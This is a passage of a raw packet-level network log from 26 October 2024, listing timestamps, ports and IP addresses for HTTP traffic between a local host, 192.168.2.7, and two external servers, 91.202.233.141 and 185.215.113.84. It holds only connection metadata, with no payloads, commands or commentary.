Oct 26, 2024 07:27:18.744622946 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.744632959 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.744702101 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.744738102 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.744744062 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.744759083 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.744759083 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.744811058 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.745042086 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.745101929 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.745119095 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.745301008 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.745301008 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.745309114 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.745322943 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.745330095 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.745361090 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.745419979 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.745923042 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.745970011 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.745975971 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.745987892 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.746016026 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.746151924 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.751243114 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751256943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751332045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751338959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.751346111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751370907 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.751411915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.751488924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751496077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751507998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751538038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.751801014 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751807928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751815081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751821041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.751846075 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.751863956 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.752221107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.752232075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.752275944 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.752351046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.752368927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.752373934 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.752394915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.752425909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.752610922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.752656937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.752661943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.752669096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.752705097 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.752737045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.752743959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.752783060 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.753175974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.753221035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.753227949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.753233910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.753254890 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.753273964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.792419910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.792428017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.792433977 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.792537928 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.806713104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.806746006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.806751013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.806775093 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.806804895 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.806824923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.806843042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.806848049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.806864977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.806891918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.827706099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.827713013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.827718973 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.827769995 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.827838898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.827877998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.827883005 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.827884912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.827927113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.865448952 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.865454912 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.865478039 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.865489006 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.865537882 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.865580082 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.865590096 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.865605116 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.865607023 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.865613937 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.865622044 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.865675926 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.865675926 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.866202116 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.866209030 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.866220951 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.866226912 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.866292000 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.866292000 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.866728067 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.866766930 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.866782904 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.866880894 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.869055033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869092941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869097948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869122982 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.869152069 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.869163036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869189024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869195938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869216919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.869232893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.869301081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869307041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869318962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869324923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869332075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869343996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.869345903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.869360924 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.869376898 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.870083094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870124102 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.870135069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870172977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.870198011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870244980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.870254040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870261908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870280981 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870296955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.870325089 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.870635033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870640993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870654106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870660067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870666027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.870690107 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.870713949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.893450022 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.893455982 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.893591881 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.910145998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.910154104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.910166025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.910249949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.910270929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.910279036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.910319090 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.924352884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.924390078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.924401045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.924407005 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.924442053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.924448967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.924448967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.924487114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.945456028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.945465088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.945471048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.945518970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.945524931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.945534945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.945558071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.945564985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.945570946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.945601940 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.985655069 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.985662937 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.985667944 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.985734940 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.986052990 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.986067057 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.986073017 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.986099958 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.986107111 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.986125946 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.986126900 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.986212015 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.986385107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.986457109 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.986593962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.986599922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.986617088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.986625910 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.986630917 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.986637115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.986643076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.986649036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.986654997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.986691952 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.986691952 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.986712933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.986792088 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.986797094 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:18.986866951 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:18.986917019 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.986922026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.986977100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.987046003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987052917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987107038 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987112999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987119913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987133026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.987226009 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.987226009 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.987603903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987610102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987656116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.987710953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987752914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.987761974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987767935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987807035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.987922907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987930059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987941027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987970114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.987984896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.987991095 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.988029957 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.988393068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.988441944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.988449097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:18.988470078 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:18.988493919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.014133930 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.014142036 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.014148951 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.014271021 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.014290094 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.014380932 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.027571917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.027611971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.027617931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.027654886 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.027658939 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.027662039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.027677059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.027678013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.027714968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.027726889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.041990995 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.041996956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.042083979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.042118073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.042124987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.042130947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.042136908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.042162895 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.042188883 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.063041925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.063049078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.063055992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.063144922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.063157082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.063163996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.063174963 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.063210964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.104295015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104310036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104434013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104437113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.104440928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104454041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104468107 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.104479074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.104487896 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104494095 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104500055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104505062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.104506016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104535103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104536057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.104542017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104548931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.104563951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.104588032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.105259895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.105309010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.105350018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.105370045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.105376005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.105431080 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.105551958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.105559111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.105597019 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.105638981 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.105644941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.105657101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.105663061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.105680943 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.105705976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.106645107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.106652021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.106663942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.106676102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:19.106683016 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.106695890 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.106697083 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.106704950 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.106756926 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.106805086 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.106812000 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.106837034 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:19.106904984 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.106934071 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.106940031 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.106950998 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.106956959 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.106998920 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.107014894 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.107758999 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.107861996 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.109198093 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.109405041 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.134602070 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.134618998 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.134632111 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.134638071 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.134713888 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.134713888 CEST	49985	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:27:19.134830952 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.134891987 CEST	80	49985	91.202.233.141	192.168.2.7
Oct 26, 2024 07:27:19.134912968 CEST	49985	80	192.168.2.7	91.202.233.141
